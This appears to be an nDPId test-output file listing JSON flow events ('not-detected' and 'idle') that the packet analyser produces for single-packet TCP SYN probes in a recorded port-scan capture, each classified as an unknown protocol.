-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 